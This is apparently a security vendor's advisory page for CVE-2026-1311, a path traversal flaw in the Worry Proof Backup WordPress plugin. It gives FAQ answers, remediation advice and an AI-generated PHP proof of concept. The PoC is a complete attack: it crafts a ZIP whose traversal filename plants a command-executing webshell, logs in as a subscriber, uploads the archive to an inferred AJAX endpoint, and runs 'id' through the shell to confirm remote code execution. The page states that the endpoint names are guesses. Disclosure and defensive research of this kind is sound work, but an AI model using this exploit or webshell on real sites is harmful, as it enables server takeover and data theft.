What is CVE-2026-1311?

CVE-2026-1311 is a high-severity authenticated path traversal vulnerability in the Worry Proof Backup plugin for WordPress, affecting versions up to and including 0.2.4. It allows authenticated users with Subscriber-level access and above to upload a malicious ZIP archive that can write arbitrary files to the server.

How does this vulnerability work?

The vulnerability arises from improper path sanitization during the extraction of uploaded ZIP files. Attackers can embed path traversal sequences in filenames within the ZIP, allowing them to write files to sensitive locations on the server, potentially leading to remote code execution.

Who is affected by this vulnerability?

Any WordPress site using the Worry Proof Backup plugin version 0.2.4 or earlier is vulnerable. Specifically, authenticated users with Subscriber-level access or higher can exploit this vulnerability to gain unauthorized access to the server.

How can I check if my site is affected?

To determine if your site is affected, check the version of the Worry Proof Backup plugin installed on your WordPress site. If it is version 0.2.4 or earlier, your site is vulnerable and should be updated immediately.

What steps should I take to fix this vulnerability?

The primary fix is to update the Worry Proof Backup plugin to the latest version, which should address this vulnerability. Additionally, review server logs for any unauthorized file uploads and ensure proper security measures are in place.

What mitigation strategies can I employ?

In addition to updating the plugin, consider implementing file upload restrictions, validating uploaded files, and monitoring user activity. Limiting user roles and permissions can also help reduce the risk of exploitation.

What does the CVSS score of 8.8 indicate?

The CVSS score of 8.8 reflects a high level of severity, indicating that the vulnerability has a low attack complexity and a significant impact on confidentiality, integrity, and availability. This means successful exploitation can lead to severe consequences for the affected system.

What are the practical risks of this vulnerability?

Successful exploitation can lead to remote code execution, allowing attackers to execute arbitrary commands on the server. This can result in website defacement, data theft, installation of backdoors, or further attacks on internal networks.

How does the proof of concept demonstrate the issue?

The proof of concept illustrates how an attacker can create a malicious ZIP file containing path traversal sequences and upload it via the plugin’s backup upload functionality. This demonstrates the ease of exploitation and the potential for serious damage.

Is there a way to test for this vulnerability?

While testing for vulnerabilities should only be conducted in authorized environments, security professionals can simulate the exploit using the proof of concept code provided. Ensure you have permission before testing on any live systems.

What should I do if I suspect my site has been compromised?

If you suspect a compromise, immediately take your site offline, investigate server logs for unauthorized access, and check for any malicious files. Restore from a clean backup if necessary and ensure all plugins are updated and secured.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-1311: Worry Proof Backup <= 0.2.4 – Authenticated (Subscriber+) Path Traversal via Backup Upload (worry-proof-backup)

CVE ID CVE-2026-1311

Plugin worry-proof-backup

Severity High (CVSS 8.8)

CWE 22

Vulnerable Version 0.2.4

Patched Version —

Disclosed February 24, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1311 (metadata-based):
The Worry Proof Backup plugin for WordPress, versions up to and including 0.2.4, contains an authenticated path traversal vulnerability. Attackers with Subscriber-level access or higher can exploit a flaw in the backup upload functionality. This flaw allows the upload of malicious ZIP archives containing path traversal sequences, leading to arbitrary file write and remote code execution.

Atomic Edge research identifies the root cause as improper path sanitization during the extraction of uploaded backup archives. The plugin likely uses a function like `extractTo()` from PHP’s ZipArchive class without validating the paths of files within the archive. This allows an attacker to embed path traversal sequences (e.g., `../../wp-config.php`) in filenames within the ZIP. The CWE-22 classification confirms this as an improper limitation of a pathname to a restricted directory. These conclusions are inferred from the CWE and vulnerability description, as no source code diff is available for confirmation.

Exploitation requires an authenticated WordPress user account. The attacker would first craft a ZIP archive containing a file with a malicious name, such as `../../../wp-content/uploads/shell.php`. They would then submit this archive via the plugin’s backup upload endpoint. Based on WordPress plugin conventions, this endpoint is likely an AJAX handler or admin-post action. A probable target is `/wp-admin/admin-ajax.php` with an `action` parameter like `worry_proof_backup_upload`. The attacker’s request would include the malicious ZIP file in a multipart form-data field, such as `backup_file`.

Effective remediation requires the plugin to validate all file paths during archive extraction. The fix must sanitize filenames by removing directory traversal sequences before writing files to disk. The plugin should also restrict extraction to a designated, safe directory within the WordPress installation, such as `wp-content/uploads/worry-proof-backup/`. Additionally, the plugin must verify the file extension of extracted content to prevent writing executable PHP files. These measures are standard for addressing CWE-22 in file upload contexts.

Successful exploitation grants an attacker full remote code execution on the target server. By writing a PHP file to a web-accessible directory, the attacker can execute arbitrary commands with the web server’s privileges. This leads to complete compromise of the WordPress site and potentially the underlying server. Attackers can deface websites, steal data, install backdoors, or pivot to internal networks. The high CVSS score of 8.8 reflects the low attack complexity and high impact on confidentiality, integrity, and availability.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-1311 - Worry Proof Backup <= 0.2.4 - Authenticated (Subscriber+) Path Traversal via Backup Upload
<?php
/**
 * This PoC is constructed based on the CVE description and common WordPress plugin patterns.
 * The exact AJAX action and parameter names are inferred from the plugin slug.
 * Assumptions:
 * 1. The vulnerable endpoint is /wp-admin/admin-ajax.php.
 * 2. The AJAX action parameter is 'action' with a value derived from the plugin slug.
 * 3. The file upload parameter is named 'backup_file'.
 * 4. The plugin does not validate ZIP file contents for path traversal.
 */

$target_url = 'https://target-site.com/wp-admin/admin-ajax.php';
$username = 'subscriber_user';
$password = 'subscriber_pass';

// Create a malicious ZIP archive in memory
$zip = new ZipArchive();
$zip_filename = sys_get_temp_dir() . '/malicious_backup.zip';

if ($zip->open($zip_filename, ZipArchive::CREATE) !== TRUE) {
    die('Failed to create ZIP archive');
}

// Add a PHP webshell with a path traversal filename
$malicious_content = '<?php if(isset($_REQUEST["cmd"])) { system($_REQUEST["cmd"]); } ?>';
$malicious_path = '../../../wp-content/uploads/shell.php'; // Path traversal to web root
$zip->addFromString($malicious_path, $malicious_content);
$zip->close();

// Initialize cURL session for login to obtain cookies
$ch = curl_init();
$login_url = str_replace('/wp-admin/admin-ajax.php', '/wp-login.php', $target_url);
$cookie_file = sys_get_temp_dir() . '/cookies.txt';

// WordPress login POST data
$login_fields = [
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url,
    'testcookie' => '1'
];

curl_setopt_array($ch, [
    CURLOPT_URL => $login_url,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query($login_fields),
    CURLOPT_COOKIEJAR => $cookie_file,
    CURLOPT_COOKIEFILE => $cookie_file,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_FOLLOWLOCATION => true,
]);

$login_response = curl_exec($ch);

// Check for successful login by looking for dashboard redirect or absence of login form
if (strpos($login_response, 'Dashboard') === false && strpos($login_response, 'wp-admin') === false) {
    die('Login likely failed. Check credentials.');
}

// Now perform the authenticated file upload to the plugin's AJAX endpoint
// Inferred AJAX action: worry_proof_backup_upload
$post_fields = [
    'action' => 'worry_proof_backup_upload'
];

// Create CURLFile object for the malicious ZIP
$cfile = new CURLFile($zip_filename, 'application/zip', 'backup_file.zip');
$post_fields['backup_file'] = $cfile;

curl_setopt_array($ch, [
    CURLOPT_URL => $target_url,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => $post_fields,
    CURLOPT_COOKIEFILE => $cookie_file,
    CURLOPT_RETURNTRANSFER => true,
]);

$upload_response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Clean up temporary file
unlink($zip_filename);

// Verify exploitation
$verify_url = 'https://target-site.com/wp-content/uploads/shell.php?cmd=id';
$ch_verify = curl_init($verify_url);
curl_setopt($ch_verify, CURLOPT_RETURNTRANSFER, true);
$verify_response = curl_exec($ch_verify);
curl_close($ch_verify);

if (strpos($verify_response, 'uid=') !== false) {
    echo "Exploit successful. RCE achieved.n";
    echo "Output: " . htmlspecialchars($verify_response) . "n";
} else {
    echo "Exploit may have failed. HTTP Code during upload: $http_coden";
    echo "Upload response: " . htmlspecialchars($upload_response) . "n";
}
?>

Frequently Asked Questions

What is CVE-2026-1311?
Understanding the vulnerability
CVE-2026-1311 is a high-severity authenticated path traversal vulnerability in the Worry Proof Backup plugin for WordPress, affecting versions up to and including 0.2.4. It allows authenticated users with Subscriber-level access and above to upload a malicious ZIP archive that can write arbitrary files to the server.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from improper path sanitization during the extraction of uploaded ZIP files. Attackers can embed path traversal sequences in filenames within the ZIP, allowing them to write files to sensitive locations on the server, potentially leading to remote code execution.
Who is affected by this vulnerability?
Identifying at-risk users
Any WordPress site using the Worry Proof Backup plugin version 0.2.4 or earlier is vulnerable. Specifically, authenticated users with Subscriber-level access or higher can exploit this vulnerability to gain unauthorized access to the server.
How can I check if my site is affected?
Verifying plugin version
To determine if your site is affected, check the version of the Worry Proof Backup plugin installed on your WordPress site. If it is version 0.2.4 or earlier, your site is vulnerable and should be updated immediately.
What steps should I take to fix this vulnerability?
Remediation actions
The primary fix is to update the Worry Proof Backup plugin to the latest version, which should address this vulnerability. Additionally, review server logs for any unauthorized file uploads and ensure proper security measures are in place.
What mitigation strategies can I employ?
Reducing risk exposure
In addition to updating the plugin, consider implementing file upload restrictions, validating uploaded files, and monitoring user activity. Limiting user roles and permissions can also help reduce the risk of exploitation.
What does the CVSS score of 8.8 indicate?
Understanding severity levels
The CVSS score of 8.8 reflects a high level of severity, indicating that the vulnerability has a low attack complexity and a significant impact on confidentiality, integrity, and availability. This means successful exploitation can lead to severe consequences for the affected system.
What are the practical risks of this vulnerability?
Potential consequences
Successful exploitation can lead to remote code execution, allowing attackers to execute arbitrary commands on the server. This can result in website defacement, data theft, installation of backdoors, or further attacks on internal networks.
How does the proof of concept demonstrate the issue?
Exploit demonstration
The proof of concept illustrates how an attacker can create a malicious ZIP file containing path traversal sequences and upload it via the plugin’s backup upload functionality. This demonstrates the ease of exploitation and the potential for serious damage.
Is there a way to test for this vulnerability?
Testing for vulnerabilities
While testing for vulnerabilities should only be conducted in authorized environments, security professionals can simulate the exploit using the proof of concept code provided. Ensure you have permission before testing on any live systems.
What should I do if I suspect my site has been compromised?
Responding to a potential breach
If you suspect a compromise, immediately take your site offline, investigate server logs for unauthorized access, and check for any malicious files. Restore from a clean backup if necessary and ensure all plugins are updated and secured.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations